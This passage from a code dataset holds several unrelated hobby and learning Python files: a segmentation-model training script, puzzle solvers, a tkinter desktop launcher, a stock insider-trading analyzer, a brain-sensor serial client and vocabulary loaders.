inverted_res_block(inputs=enc_13, in_f=in_new_f, out_f=160, alpha=alpha, stride=2, expansion=6,block_id=13)\n #, 8\n enc_15, in_new_f = inverted_res_block(inputs=enc_14, in_f=in_new_f, out_f=160, alpha=alpha, stride=1, expansion=6,block_id=14)\n enc_16, in_new_f = inverted_res_block(inputs=enc_15, in_f=in_new_f, out_f=160, alpha=alpha, stride=1, expansion=6,block_id=15)\n enc_17, in_new_f = inverted_res_block(inputs=enc_16, in_f=in_new_f, out_f=320, alpha=alpha, stride=1, expansion=6,block_id=16)\n # UP\n\n x = ConvLayer(kw=1, kh=1, in_f=in_new_f, out_f=1280, use_bias=False, activation=None, name='Conv_1/weights')(enc_17)\n x = BatchNormLayer(D=1280, name='Conv_1/BatchNorm')(x)\n x = ActivationLayer(activation=tf.nn.relu6, name='out_relu')(x)\n\n bottleneck, in_new_f = inverted_res_block(inputs=x, in_f=1280, out_f=160, alpha=alpha, 
stride=1, expansion=6, block_id=17)\n # \n\n upconv1, in_new_f = upconv(input_tensor=bottleneck, in_f=in_new_f, out_f=160, stride=1, block_id=18)\n upconv2, in_new_f = upconv(input_tensor=upconv1, in_f=in_new_f, out_f=160, stride=1, block_id=19)\n upconv3, in_new_f = upconv(input_tensor=upconv2, in_f=in_new_f, out_f=160, stride=1, block_id=20)\n\n upconv4, in_new_f = upconv(input_tensor=upconv3, in_f=in_new_f, out_f=96, stride=1, block_id=21)\n upconv5, in_new_f = upconv(input_tensor=upconv4, in_f=in_new_f, out_f=96, stride=1, block_id=22)\n upconv6, in_new_f = upconv(input_tensor=upconv5, in_f=in_new_f, out_f=96, stride=1, block_id=23)\n upconv7, in_new_f = upconv(input_tensor=upconv6, in_f=in_new_f, out_f=64, stride=1, block_id=24)\n upconv8, in_new_f = upconv(input_tensor=upconv7, in_f=in_new_f, out_f=64, stride=1, block_id=25, concat_tensor=enc_9)\n\n upconv9, in_new_f = upconv(input_tensor=upconv8, in_f=in_new_f, out_f=64, stride=1, block_id=26)\n upconv10, in_new_f = upconv(input_tensor=upconv9, in_f=in_new_f, out_f=64, stride=1, block_id=27)\n upconv11, in_new_f = upconv(input_tensor=upconv10, in_f=in_new_f, out_f=64, stride=1, block_id=28, concat_tensor=enc_6)\n\n upconv12, in_new_f = upconv(input_tensor=upconv11, in_f=in_new_f, out_f=32, stride=1, block_id=29)\n upconv13, in_new_f = upconv(input_tensor=upconv12, in_f=in_new_f, out_f=32, stride=1, block_id=30)\n upconv14, in_new_f = upconv(input_tensor=upconv13, in_f=in_new_f, out_f=32, stride=1, block_id=31, concat_tensor=enc_3)\n\n upconv15, in_new_f = upconv(input_tensor=upconv14, in_f=in_new_f, out_f=24, stride=1, block_id=32)\n upconv16, in_new_f = upconv(input_tensor=upconv15, in_f=in_new_f, out_f=24, stride=1, block_id=33, concat_tensor=enc_1)\n\n upconv17, in_new_f = upconv(input_tensor=upconv16, in_f=in_new_f, out_f=16, stride=1, block_id=34)\n\n upconv18, in_new_f = upconv(input_tensor=upconv17, in_f=in_new_f, out_f=16, stride=1, block_id=35, concat_tensor=in_x)\n\n output_x = ConvLayer(kw=1, kh=1, in_f=16, out_f=10, name='output')(upconv18)\n\n return in_x, output_x\n\n\nif __name__ == \"__main__\":\n gamma_list = [0.5, 0.75, 1.0, 1.5, 2.0]\n \n makiflow.set_main_gpu(1)\n Xtrain, Ytrain, num_pos = load_data()\n \n Xtest = Xtrain[-5:]\n Ytest = Ytrain[-5:]\n num_pos_test = num_pos[-5:]\n \n# 15\n Xtrain, Ytrain, num_pos = augment_data(Xtrain[:-5], Ytrain[:-5], num_pos[:-5])\n Xtrain, Ytrain, num_pos = shuffle(Xtrain, Ytrain, num_pos)\n \n Xtest, Ytest, num_pos_test = augment_data(Xtest, Ytest, num_pos_test)\n Xtest, Ytest, num_pos_test = shuffle(Xtest, Ytest, num_pos_test)\n \n Xtrain = np.array(Xtrain, dtype=np.float32) / 255\n Ytrain = np.array(Ytrain, dtype=np.uint8)\n Xtest = np.array(Xtest, dtype=np.float32) / 255\n Ytest = np.array(Ytest, dtype=np.uint8)\n \n for img_index in range(5):\n sns.heatmap(Ytest[img_index]).get_figure().savefig(f'result/test_{img_index}.png')\n plt.clf()\n \n in_x, output_x = get_MobileNetV2_1_224(batch_size=32)\n model = Segmentator(input_s=in_x, output=output_x)\n untrainable = [(name, False) for name in layer_name]\n model.set_layers_trainable(untrainable)\n model.set_session(tf.Session())\n \n model.load_weights('weights/weights_30.ckpt', layer_name)\n \n optimizer = tf.train.AdamOptimizer(learning_rate=10e-4)\n \n with open('test.txt', 'w') as test_out:\n for gamma in gamma_list:\n model.set_session(tf.Session())\n model.load_weights('weights/weights_30.ckpt', layer_name)\n optimizer = tf.train.AdamOptimizer(learning_rate=10e-4)\n\n loss_list = []\n iou_list = []\n for i in 
range(10):\n loss_list += model.fit_focal(images=Xtrain, labels=Ytrain, gamma=gamma, num_positives=num_pos, optimizer=optimizer, epochs=5)\n pred = model.predict(Xtest[:32])\n iou_list += dice_coeff(Ytest[:32], pred, 10, True)\n for img_index in range(5):\n sns.heatmap(pred[img_index].argmax(axis=2)).get_figure().savefig(f'result/gamma={gamma}_epochs={5 * (i+1)}_{img_index}.png')\n plt.clf()\n test_out.write(str(loss_list))\n test_out.write(str(iou_list))\n","repo_name":"Banayaki/EyePit","sub_path":"TestUnetMobileGamma.py","file_name":"TestUnetMobileGamma.py","file_ext":"py","file_size_in_byte":22579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72017054793","text":"\"\"\"\nimport mimodulo.funcs as f\n\nf.hello()\nf.bye()\n\nf.hello_by_name(\"Pepe\")\nf.hello_by_name(\"Antonio\")\nn = \"Maria\"\nf.hello_by_name(n)\nf.hello_by_name(2.3)\nf.hello_by_name(name=\"Marisa\")\n\n\nprint(f.mifunc(2, 1, 3))\nprint(f.mifunc(2, 1))\nprint(f.mifunc(2))\n\nprint(f.mifunc(2, val2=3))\nprint(f.mifunc(val1=2,val2=3))\nprint(f.mifunc()+5)\n\nprint(f.mifunc5(2, 1, 3))\n\"\"\"\n\nimport mimodulo.funcs as f\n\ntop=30\nfilename = \"score_data.json\"\n\nscore_list = f.get_score(filename)\n\nf.score_top_print(score_list)\n\nsecret = f.get_secrect(top)\n\nwhile True:\n input(\"Dame un número para acertar el secreto: \")\n\n f.save_score(filename, score_list)\n\n\n\n\n\ndef suma(x, y):\n s = x + y\n return s\n\nprint (suma(5,3))\n\ns = suma(3,2)\nz = suma(s, 5)\n\n\n\n\n\n\n\n\n","repo_name":"EnriquePJ76/smartninja","sub_path":"clase9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1360425176","text":"#import re\n#import json\n#from enum import Enum\n#import copy\n#import numpy as np\n#from collections import deque\nimport math\nimport operator\n\ndata = open(\"data.txt\", \"r\")\nlines = data.readlines()\n\n# don't think my python has dataclass\nclass BusData:\n def __init__(self, t, o):\n # bus id \n self.time = t\n # bus offset from 0\n self.offset = o\n\n def __repr__(self):\n return str(self.time) + \"@\" + str(self.offset)\n\nbus = []\n\ns = lines[1].split(\",\")\norder = 0\nfor t in s:\n if not t == \"x\":\n # order modulus bus time, as we're only looking up to bus time ahead\n # this is fine cause if bus+o is good, then bus + o + n * t is good\n bus.append(BusData(int(t), order%int(t)))\n order += 1\n\n# start with the biggest bus time\nsearch = bus.copy()\nsearch.sort(key=operator.attrgetter('time'))\nsearch.reverse()\n\nprint(search)\n\nbusmax = search[0]\nsearch.remove(busmax)\n\ncur = busmax.time - busmax.offset\nstep = busmax.time\n\nfor bus in search:\n while True:\n # check current\n next_t = bus.time * math.ceil(cur/bus.time)\n if next_t == cur + bus.offset:\n break\n\n cur += step\n\n # at this point we know the buses so far all align, therefore we can step by their product\n step *= bus.time\n\nprint(cur)\n","repo_name":"rkjfb/advent2020","sub_path":"13/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6935974626","text":"from sys import setrecursionlimit\r\nsetrecursionlimit(10**5)\r\nn, m, k = map(int, input().split())\r\n#n = row, m = col\r\ngrid = [[0 for _ in range(m)] for _ in range(n)]\r\n\r\nresult = []\r\nfor _ in range(k):\r\n r_, c_ = map(int, input().split())\r\n 
grid[r_-1][c_-1] = 1\r\n\r\nvisited = [[False for _ in range(m)] for _ in range(n)]\r\ndirection = [(-1, 0), (1, 0), (0, -1), (0, 1)]\r\n\r\ndef DFS(cur_x, cur_y):\r\n size = 1\r\n visited[cur_x][cur_y] = 1\r\n for dx, dy in direction:\r\n nx = cur_x + dx\r\n ny = cur_y + dy\r\n if 0<=nx]+\\?>)\", r\"\\1\", rawXml) + \"\")\n # return ET.parse(sourceFolderpath + '\\\\data\\\\' + shipLayoutName + '.xml')\n except FileNotFoundError:\n logger.error('No layout XML file found for shipBlueprint layout attribute: %s' % shipLayoutName)\n\n\ndef saveShipLayoutStandalone(layout, shipLayoutName, sourceFolderpath, developerBackup):\n os.makedirs(sourceFolderpath + '\\\\data\\\\', exist_ok=True)\n filepath = sourceFolderpath + '\\\\data\\\\' + shipLayoutName + '.xml'\n ET.ElementTree(layout).write(filepath, encoding='utf-8', xml_declaration=True)\n removeRootNode(filepath)\n if developerBackup == True:\n os.makedirs('layouts/', exist_ok=True)\n developerBackupFilepath = 'layouts/' + shipLayoutName + '.xml'\n ET.ElementTree(layout).write(developerBackupFilepath, encoding='utf-8', xml_declaration=True)\n removeRootNode(developerBackupFilepath)\n\n\ndef saveShipLayoutAsAppendFile(appendContentString, shipLayoutName, addonFolderpath, developerBackup):\n os.makedirs(addonFolderpath + '\\\\data\\\\', exist_ok=True)\n filepath = addonFolderpath + '\\\\data\\\\' + shipLayoutName + '.xml.append'\n if os.path.exists(filepath):\n os.remove(filepath)\n with open(filepath, \"w\") as appendFile:\n appendFile.write(appendContentString)\n if developerBackup == True:\n os.makedirs('layouts/', exist_ok=True)\n developerBackupFilepath = 'layouts/' + shipLayoutName + '.xml.append'\n with open(developerBackupFilepath, \"w\") as appendFile:\n appendFile.write(appendContentString)\n\n\ndef removeRootNode(filepath):\n # taken and heavily adjusted from https://pynative.com/python-delete-lines-from-file/\n with open(filepath, 'r+') as file:\n content = file.read()\n file.seek(0)\n content = content.replace(\"\", '').replace(\"\", '')\n file.write(content)\n file.truncate()\n","repo_name":"Epirasque/FTLshipGibGenerator","sub_path":"fileHandling/ShipLayoutDao.py","file_name":"ShipLayoutDao.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"20481165570","text":"# -*- coding: utf-8 -*-\nfrom tkinter import*\nimport os\nimport string\nimport random\nfrom PIL import ImageTk,Image\n\nMAX_ROWS = 36\nFONT_SIZE = 10 # (pixels)\n\nCOLORS = ['snow', 'ghost white', 'white smoke', 'gainsboro', 'floral white', 'old lace',\n 'linen', 'antique white', 'papaya whip', 'blanched almond', 'bisque', 'peach puff',\n 'navajo white', 'lemon chiffon', 'mint cream', 'azure', 'alice blue', 'lavender',\n 'lavender blush', 'misty rose', 'dark slate gray', 'dim gray', 'slate gray',\n 'light slate gray', 'gray', 'light grey', 'midnight blue', 'navy', 'cornflower blue', 'dark slate blue',\n 'slate blue', 'medium slate blue', 'light slate blue', 'medium blue', 'royal blue', 'blue',\n 'dodger blue', 'deep sky blue', 'sky blue', 'light sky blue', 'steel blue', 'light steel blue',\n 'light blue', 'powder blue', 'pale turquoise', 'dark turquoise', 'medium turquoise', 'turquoise',\n 'cyan', 'light cyan', 'cadet blue', 'medium aquamarine', 'aquamarine', 'dark green', 'dark olive green',\n 'dark sea green', 'sea green', 'medium sea green', 'light sea green', 'pale green', 'spring green',\n 'lawn green', 'medium spring green', 'green yellow', 'lime green', 'yellow 
green',\n 'forest green', 'olive drab', 'dark khaki', 'khaki', 'pale goldenrod', 'light goldenrod yellow',\n 'light yellow', 'yellow', 'gold', 'light goldenrod', 'goldenrod', 'dark goldenrod', 'rosy brown',\n 'indian red', 'saddle brown', 'sandy brown',\n 'dark salmon', 'salmon', 'light salmon', 'orange', 'dark orange',\n 'coral', 'light coral', 'tomato', 'orange red', 'red', 'hot pink', 'deep pink', 'pink', 'light pink',\n 'pale violet red', 'maroon', 'medium violet red', 'violet red',\n 'medium orchid', 'dark orchid', 'dark violet', 'blue violet', 'purple', 'medium purple',\n 'thistle', 'snow2', 'snow3',\n 'snow4', 'seashell2', 'seashell3', 'seashell4', 'AntiqueWhite1', 'AntiqueWhite2',\n 'AntiqueWhite3', 'AntiqueWhite4', 'bisque2', 'bisque3', 'bisque4', 'PeachPuff2',\n 'PeachPuff3', 'PeachPuff4', 'NavajoWhite2', 'NavajoWhite3', 'NavajoWhite4',\n 'LemonChiffon2', 'LemonChiffon3', 'LemonChiffon4', 'cornsilk2', 'cornsilk3',\n 'cornsilk4', 'ivory2', 'ivory3', 'ivory4', 'honeydew2', 'honeydew3', 'honeydew4',\n 'LavenderBlush2', 'LavenderBlush3', 'LavenderBlush4', 'MistyRose2', 'MistyRose3',\n 'MistyRose4', 'azure2', 'azure3', 'azure4', 'SlateBlue1', 'SlateBlue2', 'SlateBlue3',\n 'SlateBlue4', 'RoyalBlue1', 'RoyalBlue2', 'RoyalBlue3', 'RoyalBlue4', 'blue2', 'blue4',\n 'DodgerBlue2', 'DodgerBlue3', 'DodgerBlue4', 'SteelBlue1', 'SteelBlue2',\n 'SteelBlue3', 'SteelBlue4', 'DeepSkyBlue2', 'DeepSkyBlue3', 'DeepSkyBlue4',\n 'SkyBlue1', 'SkyBlue2', 'SkyBlue3', 'SkyBlue4', 'LightSkyBlue1', 'LightSkyBlue2',\n 'LightSkyBlue3', 'LightSkyBlue4', 'SlateGray1', 'SlateGray2', 'SlateGray3',\n 'SlateGray4', 'LightSteelBlue1', 'LightSteelBlue2', 'LightSteelBlue3',\n 'LightSteelBlue4', 'LightBlue1', 'LightBlue2', 'LightBlue3', 'LightBlue4',\n 'LightCyan2', 'LightCyan3', 'LightCyan4', 'PaleTurquoise1', 'PaleTurquoise2',\n 'PaleTurquoise3', 'PaleTurquoise4', 'CadetBlue1', 'CadetBlue2', 'CadetBlue3',\n 'CadetBlue4', 'turquoise1', 'turquoise2', 'turquoise3', 'turquoise4', 'cyan2', 'cyan3',\n 'cyan4', 'DarkSlateGray1', 'DarkSlateGray2', 'DarkSlateGray3', 'DarkSlateGray4',\n 'aquamarine2', 'aquamarine4', 'DarkSeaGreen1', 'DarkSeaGreen2', 'DarkSeaGreen3',\n 'DarkSeaGreen4', 'SeaGreen1', 'SeaGreen2', 'SeaGreen3', 'PaleGreen1', 'PaleGreen2',\n 'PaleGreen3', 'PaleGreen4', 'SpringGreen2', 'SpringGreen3', 'SpringGreen4',\n 'green2', 'green3', 'green4', 'chartreuse2', 'chartreuse3', 'chartreuse4',\n 'OliveDrab1', 'OliveDrab2', 'OliveDrab4', 'DarkOliveGreen1', 'DarkOliveGreen2',\n 'DarkOliveGreen3', 'DarkOliveGreen4', 'khaki1', 'khaki2', 'khaki3', 'khaki4',\n 'LightGoldenrod1', 'LightGoldenrod2', 'LightGoldenrod3', 'LightGoldenrod4',\n 'LightYellow2', 'LightYellow3', 'LightYellow4', 'yellow2', 'yellow3', 'yellow4',\n 'gold2', 'gold3', 'gold4', 'goldenrod1', 'goldenrod2', 'goldenrod3', 'goldenrod4',\n 'DarkGoldenrod1', 'DarkGoldenrod2', 'DarkGoldenrod3', 'DarkGoldenrod4',\n 'RosyBrown1', 'RosyBrown2', 'RosyBrown3', 'RosyBrown4', 'IndianRed1', 'IndianRed2',\n 'IndianRed3', 'IndianRed4', 'sienna1', 'sienna2', 'sienna3', 'sienna4', 'burlywood1',\n 'burlywood2', 'burlywood3', 'burlywood4', 'wheat1', 'wheat2', 'wheat3', 'wheat4', 'tan1',\n 'tan2', 'tan4', 'chocolate1', 'chocolate2', 'chocolate3', 'firebrick1', 'firebrick2',\n 'firebrick3', 'firebrick4', 'brown1', 'brown2', 'brown3', 'brown4', 'salmon1', 'salmon2',\n 'salmon3', 'salmon4', 'LightSalmon2', 'LightSalmon3', 'LightSalmon4', 'orange2',\n 'orange3', 'orange4', 'DarkOrange1', 'DarkOrange2', 'DarkOrange3', 'DarkOrange4',\n 'coral1', 'coral2', 'coral3', 'coral4', 'tomato2', 
'tomato3', 'tomato4', 'OrangeRed2',\n 'OrangeRed3', 'OrangeRed4', 'red2', 'red3', 'red4', 'DeepPink2', 'DeepPink3', 'DeepPink4',\n 'HotPink1', 'HotPink2', 'HotPink3', 'HotPink4', 'pink1', 'pink2', 'pink3', 'pink4',\n 'LightPink1', 'LightPink2', 'LightPink3', 'LightPink4', 'PaleVioletRed1',\n 'PaleVioletRed2', 'PaleVioletRed3', 'PaleVioletRed4', 'maroon1', 'maroon2',\n 'maroon3', 'maroon4', 'VioletRed1', 'VioletRed2', 'VioletRed3', 'VioletRed4',\n 'magenta2', 'magenta3', 'magenta4', 'orchid1', 'orchid2', 'orchid3', 'orchid4', 'plum1',\n 'plum2', 'plum3', 'plum4', 'MediumOrchid1', 'MediumOrchid2', 'MediumOrchid3',\n 'MediumOrchid4', 'DarkOrchid1', 'DarkOrchid2', 'DarkOrchid3', 'DarkOrchid4',\n 'purple1', 'purple2', 'purple3', 'purple4', 'MediumPurple1', 'MediumPurple2',\n 'MediumPurple3', 'MediumPurple4', 'thistle1', 'thistle2', 'thistle3', 'thistle4',\n 'gray1', 'gray2', 'gray3', 'gray4', 'gray5', 'gray6', 'gray7', 'gray8', 'gray9', 'gray10',\n 'gray11', 'gray12', 'gray13', 'gray14', 'gray15', 'gray16', 'gray17', 'gray18', 'gray19',\n 'gray20', 'gray21', 'gray22', 'gray23', 'gray24', 'gray25', 'gray26', 'gray27', 'gray28',\n 'gray29', 'gray30', 'gray31', 'gray32', 'gray33', 'gray34', 'gray35', 'gray36', 'gray37',\n 'gray38', 'gray39', 'gray40', 'gray42', 'gray43', 'gray44', 'gray45', 'gray46', 'gray47',\n 'gray48', 'gray49', 'gray50', 'gray51', 'gray52', 'gray53', 'gray54', 'gray55', 'gray56',\n 'gray57', 'gray58', 'gray59', 'gray60', 'gray61', 'gray62', 'gray63', 'gray64', 'gray65',\n 'gray66', 'gray67', 'gray68', 'gray69', 'gray70', 'gray71', 'gray72', 'gray73', 'gray74',\n 'gray75', 'gray76', 'gray77', 'gray78', 'gray79', 'gray80', 'gray81', 'gray82', 'gray83',\n 'gray84', 'gray85', 'gray86', 'gray87', 'gray88', 'gray89', 'gray90', 'gray91', 'gray92',\n 'gray93', 'gray94', 'gray95', 'gray97', 'gray98', 'gray99']\n\ndef color_choice():\n root = Tk()\n root.title(\"Named colour chart\")\n row = 0\n col = 0\n for color in COLORS:\n e = Label(root, text=color, background=color, \n font=(None, -FONT_SIZE))\n e.grid(row=row, column=col, sticky=E+W)\n row += 1\n if (row > 36):\n row = 0\n col += 1\n \n root.mainloop()\n\n\nfilen=os.listdir(os.getcwd())\nfiles = []\nfor i in range(len(filen)):\n if '.py' in filen[i]:\n files.append(filen[i])\n\ndef refreshe():\n fichier = open(\"./sources/settings/colors\",\"r\")\n couleur=fichier.read()\n fichier.close()\n window.config(bg=couleur)\n\ndef shutdown():\n os.popen(\"shutdown -f now\",\"r\")\n\ndef ba():\n global button0\n global files\n global barre\n \n barre = Tk()\n barre.geometry(\"80x140\")\n barre.config(bg=couleur)\n barre.title(\"barre de lancement d'applications\")\n button0=Listbox(barre,xscrollcommand='YES',yscrollcommand='YES')\n button0.pack()\n button0.bind('',runa)\n button0.config(bg=couleur)\n if couleur == 'black':\n button0.config(fg='white')\n nbr=0\n fichier = open('./sources/settings/sombre','r')\n sombre = fichier.read()\n fichier.close()\n \n if sombre == 'oui':\n button0.config(bg='black',fg='white')\n else:\n barre.config(bg=couleur)\n for name in files:\n nbr+=1\n if name[:-3]=='accueuil':\n continue\n elif name[:-3]=='main':\n continue\n elif name[:-3]=='current':\n continue\n elif name[:-3]=='game':\n continue\n elif name[:-3]=='test':\n continue\n elif name[:-3]=='player':\n continue\n elif name[:-3]=='window':\n continue\n \n elif name[-3:]=='.py':\n a=name[:-3]\n button0.insert(END,name[:-3])\n button0.insert(END,'réglages')\n \ndef runa(event):\n if button0.get(button0.curselection()[0]) == 'réglages':\n 
reglages()\n else:\n os.popen('python3 '+button0.get(button0.curselection()[0])+'.py','r')\n \ndef butge(a):\n alea = random.randint(0,10)\n if alea == 4:\n fichier = open(\"./sources/settings/jeu.txt\",\"w\")\n fichier.write(a)\n fichier.close()\n os.popen(\"python3 test.py\")\n else:\n a=os.popen(\"python3 \"+a+\".py\",\"r\").read()\n print(a)\n\ndef sobre():\n global mode\n global barre\n if mode == 'oui':\n fichier = open(\"./sources/settings/sombre\",\"w\")\n fichier.write('non')\n fichier.close()\n window.config(bg=couleur)\n mode = 'non'\n if barre :\n barre.config(bg=couleur)\n if couleur == 'black':\n button0.config(bg=couleur,fg='white')\n else:\n button0.config(bg=couleur,fg='black')\n elif mode == 'non':\n fichier = open(\"./sources/settings/sombre\",\"w\")\n fichier.write('oui')\n fichier.close()\n window.config(bg='black')\n mode = 'oui'\n if barre :\n barre.config(bg='black')\n button0.config(bg='black',fg='white')\n \ndef reglages():\n file = open('./sources/settings/sombre','r')\n so = file.read()\n file.close()\n \n global color_change\n global emplacementent\n global mode\n global hello\n sett = Tk()\n sett.title(\"settings\")\n sett.geometry(\"400x400\")\n hello=StringVar()\n entre = Button(sett,text = \"valider la couleure\", command=couleure)\n refresh = Button(sett, text = \"rafraichir l'écran\", command=refreshe)\n sombritude = Checkbutton(sett, text='mode sombre',command=sobre)\n sombritude.pack()\n different_colors=Button(sett, text='toutes les couleurs',command=color_choice)\n different_colors.pack()\n if so == 'oui':\n sombritude.select()\n mode = 'oui'\n elif so =='non':\n sombritude.deselect()\n mode='non'\n color_change = Entry(sett)\n label_color = Label(sett, text=\"Entrez la couleure : \")\n \n label_color.pack()\n color_change.pack()\n entre.pack()\n refresh.pack()\n\ndef couleure():\n global couleur\n couleur=str(color_change.get())\n if couleur == 'anton appel est la plus belle personne qui existe sur terre':\n file=open('./fichiers/texte/wp.txt','w')\n file.write('Anton est effectivement la plus jolie personne au monde mais pas besoin de le crier sur tous les toits, on le sait déja tous x).')\n file.close()\n color_change.delete(0,END)\n color_change.insert(END,'/texte/wp.txt')\n else:\n try:\n if couleur == 'sombre':\n fichier = open(\"./sources/settings/sombre\",'w')\n fichier.write('oui')\n fichier.close()\n window.config(bg='black')\n else:\n window.config(bg=couleur)\n fichier = open(\"./sources/settings/colors\", \"w\")\n fichier.write(couleur)\n fichier.close()\n \n except TclError:\n color_change.delete(0,END)\n color_change.insert(END,'Mauvaise couleur indiquée')\n\ndef navigateur():\n os.popen(\"python3 internet.py\", \"r\")\n\n\ndef destroy(event):\n window.destroy()\n\n\n\n#configuration des couleurs\nfichier=open(\"./sources/settings/colors\", \"r\")\ncouleur=fichier.read()\nfichier.close()\n\n\n\n# configuration de la fenetre\nwindow = Tk()\n\nwindow.bind(\"\"+\"q\",destroy)\nwindow.title(\"bureau\")\nwindow.attributes('-fullscreen', True)\n\nwindow.config(bg=couleur)\n\nfile = open('./sources/settings/sombre','r')\nso = file.read()\nfile.close()\n\nif so == 'oui':\n window.config(bg = 'black')\n\nwindow.minsize(480, 360)\nframe = Frame(window, bg='black')\nright_frame = Frame(frame, bg='black',)\nleft_frame = Frame(frame, bg='black',)\nright_frame.grid(row=0, column=0, sticky=W)\nleft_frame.grid(row=0, column=2, sticky=W)\n\nframe.pack(expand=YES)\n\nbarre_menu = Button(left_frame, text=\"barre d'application\", 
command=ba)\nbarre_menu.pack()\n\nbarre_de_menu = Menu(window)\n\nmenu_fichier = Menu(barre_de_menu, tearoff=0)\nmenu_app = Menu(barre_de_menu, tearoff=0)\n\n\nmenu_fichier.add_command(label=\"quitter\", command=window.destroy)\nmenu_fichier.add_command(label=\"éteindre\", command=shutdown)\nmenu_app.add_command(label=\"barre d'application\", command=ba)\n\nbarre_de_menu.add_cascade(label=\"quitter\",menu=menu_fichier)\nbarre_de_menu.add_cascade(label=\"programmes\",menu=menu_app)\n\nwindow.config(menu=barre_de_menu)\n\n\nwindow.mainloop()","repo_name":"QuentinBubu/Chubuntu_1.2","sub_path":"Chubuntu_1.2/sources/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71362751432","text":"import sys\nimport api\nimport graph\n\n\ndef main():\n print(\"Check Data on:\")\n print(\"1. Single Day\")\n print(\"2. Multiple Days\")\n print(\"3. 26-01-2020 to 26-01-2021\")\n choice = int(input(\"Choice: \"))\n res = None\n if choice == 1:\n checkSingleDay()\n elif choice == 2:\n checkMultipleDays()\n elif choice == 3:\n checkMultipleDays(ffrom_date=\"26-01-2020\", tto_date= \"26-01-2021\")\n else:\n print(\"Invalid Choice\")\n sys.exit(-1) \n\ndef checkSingleDay():\n chk_date = input(\"Enter data as 26-01-2021: \")\n res = api.fetchEquityDataForSingleDay(on_date=chk_date, useCache=True)\n if res is None:\n print(\"Error API broke or No results\")\n else:\n graph.plotCompanyConsolidated(res, f\"Insider Trading: {chk_date}\", saveImage=True)\n\ndef checkMultipleDays(ffrom_date=None, tto_date=None):\n if ffrom_date is None or tto_date is None:\n print(\"Enter date range (inclusive)\")\n ffrom_date = input(\"Enter FROM data as 26-01-2021: \")\n tto_date = input(\"Enter TO data as 26-01-2021: \")\n res = api.fetchEquityData(from_date=ffrom_date,to_date=tto_date,useCache=True)\n if res is None:\n print(\"Error API broke or No results\")\n else:\n print(\"\\nAnalyze:\")\n print(\"1. All companies consolidated\")\n print(\"2. 
Single Company over this Time\")\n choice = int(input(\"Choice: \"))\n if choice==1:\n graph.plotCompanyConsolidated(res, f\"Insider Trading: {ffrom_date} to {tto_date}\", saveImage=True)\n elif choice==2:\n sym = input(\"Enter symbol: \")\n graph.plotTargetCompanyByDate(res,sym,f\"Insider Trading at {sym}: {ffrom_date} to {tto_date}\",saveImage=True)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"yashx/InsiderTradingNSE","sub_path":"onlineMain.py","file_name":"onlineMain.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"15615862285","text":"import gevent\nimport serial\n\nfrom ...client import NeuroClient\n\n\ntickrate = 64\ntick = 1.00 / tickrate\n\nDEVICE_PATH = '/dev/ttyACM0'\n\nSENSORS = [\n 'Signal Strength',\n 'Attention',\n 'Meditation',\n 'Delta',\n 'Theta',\n 'Low Alpha',\n 'High Alpha',\n 'Low Beta',\n 'High Beta',\n 'Low Gamma',\n 'High Gamma',\n]\n\n\nif __name__ == '__main__':\n client = NeuroClient('mindflex')\n comm = serial.Serial(DEVICE_PATH)\n\n while True:\n csv = comm.readline()\n if not csv:\n continue\n\n str_data = csv.split(',')\n if len(str_data) != len(SENSORS):\n continue\n\n data = map(float, str_data)\n sensors = dict(zip(SENSORS, data))\n\n client.record_sensors(sensors)\n\n gevent.sleep(tick)\n","repo_name":"tracyingram/neuro-game","sub_path":"neuro-collector/neuro_collector/clients/mindflex/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"1805975159","text":"from collections import namedtuple, defaultdict\n\n\ndef load_vocab_dict(vocab_file_name, vocab_max_size=None, start_vocab_count=None):\n with open(vocab_file_name) as f:\n text = [x.strip() for x in f.readlines()]\n if vocab_max_size:\n text = text[:vocab_max_size]\n if start_vocab_count:\n file_content = dict(zip(text, range(0 + start_vocab_count, len(text) + start_vocab_count)))\n else:\n file_content = dict(zip(text, range(0, len(text))))\n return file_content\n\n\ndef load_definition_dict(path):\n with open(path, 'r') as f:\n definition = [[y.strip() for y in x.strip().split('')] for x in f.readlines()]\n definition = {k:v.strip().split() for k,v in definition}\n return definition\n\n\ndef get_definition_vocab(def_dict):\n counts = {}\n for _, v in def_dict.items():\n for word in v:\n if word not in counts:\n counts[word] = 0\n counts[word] += 1\n vocab = {'': 0, '': 1}\n idx = 2\n for k, _ in sorted(counts.items(), key=lambda x: x[1], reverse=True):\n vocab[k] = idx\n idx += 1\n return vocab\n\n\nBASE_PATH = '.' 
